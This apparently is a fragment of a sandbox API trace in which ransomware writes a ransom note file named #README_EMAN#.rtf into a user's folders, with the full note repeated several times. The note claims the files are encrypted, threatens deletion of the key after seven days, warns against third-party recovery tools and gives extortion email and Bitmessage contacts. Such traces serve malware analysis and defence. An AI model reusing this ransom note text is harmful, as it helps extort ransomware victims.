ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.703] WriteFile (in: hFile=0x2cc, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.703] CloseHandle (hObject=0x2cc) returned 1 [0289.703] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\#readme_eman#.rtf")) returned 0xffffffff [0289.703] GetLastError () returned 0x2 [0289.703] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.704] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.704] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.704] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer 